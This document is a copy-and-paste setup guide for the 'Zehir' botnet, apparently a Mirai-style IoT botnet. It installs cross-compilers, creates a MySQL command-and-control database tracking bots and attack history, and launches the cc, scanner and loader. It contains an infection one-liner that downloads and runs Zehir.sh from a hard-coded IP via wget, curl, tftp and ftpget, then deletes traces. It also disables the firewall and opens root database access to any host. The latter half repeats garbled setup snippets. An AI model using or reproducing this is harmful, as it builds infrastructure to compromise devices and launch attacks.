// COPY AND PASTE COMMANDS INTO YOUR VPS

yum update -y
yum install epel-release -y
yum groupinstall "Development Tools" -y
yum install gmp-devel -y
ln -s /usr/lib64/libgmp.so.3  /usr/lib64/libgmp.so.10
yum install screen wget bzip2 gcc nano gcc-c++ electric-fence sudo git libc6-dev httpd xinetd tftpd tftp-server mysql mysql-server gcc glibc-static -y

mkdir /etc/xcompile
cd /etc/xcompile 
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i586.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-m68k.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sh4.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sparc.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv4l.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv5l.tar.bz2
wget http://distro.ibiblio.org/slitaz/sources/packages/c/cross-compiler-armv6l.tar.bz2
wget https://landley.net/aboriginal/downloads/old/binaries/1.2.6/cross-compiler-armv7l.tar.bz2

tar -jxf cross-compiler-i586.tar.bz2
tar -jxf cross-compiler-m68k.tar.bz2
tar -jxf cross-compiler-mips.tar.bz2
tar -jxf cross-compiler-mipsel.tar.bz2
tar -jxf cross-compiler-powerpc.tar.bz2
tar -jxf cross-compiler-sh4.tar.bz2
tar -jxf cross-compiler-sparc.tar.bz2
tar -jxf cross-compiler-armv4l.tar.bz2
tar -jxf cross-compiler-armv5l.tar.bz2
tar -jxf cross-compiler-armv6l.tar.bz2
tar -jxf cross-compiler-armv7l.tar.bz2
rm -rf *.tar.bz2
mv cross-compiler-i586 i586
mv cross-compiler-m68k m68k
mv cross-compiler-mips mips
mv cross-compiler-mipsel mipsel
mv cross-compiler-powerpc powerpc
mv cross-compiler-sh4 sh4
mv cross-compiler-sparc sparc
mv cross-compiler-armv4l armv4l
mv cross-compiler-armv5l armv5l
mv cross-compiler-armv6l armv6l
mv cross-compiler-armv7l armv7l

cd /tmp
wget https://go.dev/dl/go1.18.linux-arm64.tar.gz -C /usr/local
export GOROOT=/usr/local/go
export GOPATH=$HOME/Projects/Proj1
export PATH=$GOPATH/bin:$GOROOT/bin:$PATH
export PATH=$PATH:/usr/local/go/bin
export GO111MODULE=off
go version
go env
cd ~/
go get github.com/go-sql-driver/mysql
go get github.com/mattn/go-shellwords
go get -u github.com/golang/lint/golint

=========================stop=============================
==========================================================

service mysqld start
mysql_secure_installation

==========================================================
==========================================================

// Now Login with your mysql pass by running this command:

==========================================================
==========================================================

mysql -u root -p

==========================================================
==========================================================

========================DATABASE!=========================
==========================================================
use mysql
GRANT ALL ON *.* to root@'%' IDENTIFIED BY 'root';
FLUSH PRIVILEGES;

CREATE DATABASE Unstable;
use Unstable;
CREATE TABLE `history` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` int(10) unsigned NOT NULL,
  `time_sent` int(10) unsigned NOT NULL,
  `duration` int(10) unsigned NOT NULL,
  `command` text NOT NULL,
  `max_bots` int(11) DEFAULT '-1',
  PRIMARY KEY (`id`),
  KEY `user_id` (`user_id`)
);
 
CREATE TABLE `users` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `username` varchar(32) NOT NULL,
  `password` varchar(32) NOT NULL,
  `duration_limit` int(10) unsigned DEFAULT NULL,
  `cooldown` int(10) unsigned NOT NULL,
  `wrc` int(10) unsigned DEFAULT NULL,
  `last_paid` int(10) unsigned NOT NULL,
  `max_bots` int(11) DEFAULT '-1',
  `admin` int(10) unsigned DEFAULT '0',
  `intvl` int(10) unsigned DEFAULT '30',
  `api_key` text,
  PRIMARY KEY (`id`),
  KEY `username` (`username`)
);
 
CREATE TABLE `whitelist` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `prefix` varchar(16) DEFAULT NULL,
  `netmask` tinyint(3) unsigned DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `prefix` (`prefix`)
);

INSERT INTO users VALUES (NULL, 'root', 'admin', 0, 0, 0, 0, -1, 1, 30, '');

CREATE TABLE `logins` (
  `id` int(11) NOT NULL,
  `username` varchar(32) NOT NULL,
  `action` varchar(32) NOT NULL,
  `ip` varchar(15) NOT NULL,
  `timestamp` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
exit;




 UPDATE mysql.user SET Password=PASSWORD('password') WHERE User='root'; 
==========================STOP============================
==========================================================

==========================================================
==========================================================
iptables -F;service iptables stop 
service httpd restart  
service mysqld restart
==========================================================
==========================================================
cd ~/
chmod 0777 * -R
sudo sh build.sh 103.162.29.212
==========================================================
==========================================================


python payload.py 103.162.29.212
nano /usr/include/bits/typesizes.h
scroll down and edit the 1024 to 999999
THEN SAVE IT 
ulimit -n 999999; ulimit -u 999999; ulimit -e 999999
==========================================================
==========================================================
sudo chmod u+s /usr/bin/screen
sudo chmod 755 /var/run/screen
cd ~/
sudo screen -S cc ./cc
CTRL A D

cd loader/
screen -S rep ./scanListen 
CTRL A D

screen -S loader./run.sh
CTRL A D
GO111MODULE=on
go env -w GO111MODULE=off
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://103.162.29.212/Zehir.sh; curl -O http://103.162.29.212/Zehir.sh; chmod 777 Zehir.sh; sh Zehir.sh; tftp 103.162.29.212 -c get Zehir.sh; chmod 777 Zehir.sh; sh Zehir.sh; tftp -r Zehir2.sh -g 103.162.29.212; chmod 777 Zehir2.sh; sh Zehir2.sh; ftpget -v -u anonymous -p anonymous -P 21 103.162.29.212 Zehir1.sh Zehir1.sh; sh Zehir1.sh; rm -rf Zehir.sh Zehir.sh Zehir2.sh Zehir1.sh; rm -rf *

Zehir Botnet Port: 9375

This is gift from UN5T48L3

sudo systemctl restart mariadb


Discord : Yzykar#2394
Skype : live:yzykar123
Shop : http://yzykar.0ffsecurity.net/
Notre site : http://0ffsecurity.net/
 
 # Centos 7 #
# systemctl start mariadb.service
or
# systemctl start mysql.service
or
# systemctl start mariadb

iptables -F
systemctl stop mariadb
systemctl start mariadb
or
# systemctl start mysql
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv4l.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv5l.tar.bz2
wget http://distro.ibiblio.org/slitaz/sources/packages/c/cross-compiler-armv6l.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i586.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i686.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-m68k.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sh4.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sparc.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-x86_64.tar.bz2
 
tar -jxf cross-compiler-armv4l.tar.bz2
tar -jxf cross-compiler-armv5l.tar.bz2
tar -jxf cross-compiler-armv6l.tar.bz2
tar -jxf cross-compiler-i586.tar.bz2
tar -jxf cross-compiler-i686.tar.bz2
tar -jxf cross-compiler-m68k.tar.bz2
tar -jxf cross-compiler-mips.tar.bz2
tar -jxf cross-compiler-mipsel.tar.bz2
tar -jxf cross-compiler-powerpc.tar.bz2
tar -jxf cross-compiler-sh4.tar.bz2
tar -jxf cross-compiler-sparc.tar.bz2
tar -jxf cross-compiler-x86_64.tar.bz2
 
rm *.tar.bz2
mv cross-compiler-armv4l armv4l
mv cross-compiler-armv5l armv5l
mv cross-compiler-armv6l armv6l
mv cross-compiler-i586 i586
mv cross-compiler-i686 i686
mv cross-compiler-m68k m68k
mv cross-compiler-mips mips
mv cross-compiler-mipsel mipsel
mv cross-compiler-powerpc powerpc
mv cross-compiler-sh4 sh4
mv cross-compiler-sparc sparc
mv cross-compiler-x86_64 x86_64
 
 
Adding the paths - Run this in your ssh terminal
 
export PATH=$PATH:/etc/xcompile/armv4l/bin
export PATH=$PATH:/etc/xcompile/armv5l/bin
export PATH=$PATH:/etc/xcompile/armv6l/bin
export PATH=$PATH:/etc/xcompile/i586/bin
export PATH=$PATH:/etc/xcompile/i686/bin
export PATH=$PATH:/etc/xcompile/m68k/bin
export PATH=$PATH:/etc/xcompile/mips/bin
export PATH=$PATH:/etc/xcompile/mipsel/bin
export PATH=$PATH:/etc/xcompile/powerpc/bin
export PATH=$PATH:/etc/xcompile/powerpc-440fp/bin
export PATH=$PATH:/etc/xcompile/sh4/bin
export PATH=$PATH:/etc/xcompile/sparc/bin
export PATH=$PATH:/etc/xcompile/armv6l/bin
export PATH=$PATH:/usr/local/go/bin
export GOPATH=$HOME/Documents/go
go get github.com/go-sql-driver/mysql
go get github.com/mattn/go-shellwords



sudo mysqld_safe --skip-grant-tables &
Log into MySQL using root

mysql -u root
Select the MySQL database to use

use mysql;
Reset the password

-- MySQL version < 5.7
update user set password=PASSWORD("Admin123@") where User='root';

-- MySQL 5.7, mysql.user table "password" field -> "authentication_string"

update user set authentication_string=password('Admin123@') where user='root';
Flush the privileges

SET PASSWORD FOR 'root'@'localhost' = PASSWORD('Admin123@');
FLUSH PRIVILEGES;

flush privileges;
CREATE DATABASE Unstable;
USE Unstable; 

ALTER USER 'root'@'localhost' IDENTIFIED BY 'Admin123@';

mysql_install_db --user=mysql --basedir=/usr --datadir=/var/lib/mysql
sudo systemctl start mysqld
sudo systemctl start mariadb.service
ps -A|grep mysql

/etc/init.d/mysql stop
apt-get uninstall mysql


yum remove mysql
yum -y install mariadb-server mariadb
service mariadb start


systemctl stop mysqld


systemctl stop mysqld
[root@localhost ~]# systemctl set-environment MYSQLD_OPTS="--skip-grant-tables"
[root@localhost ~]# systemctl start mysqld
[root@localhost ~]# mysql -u root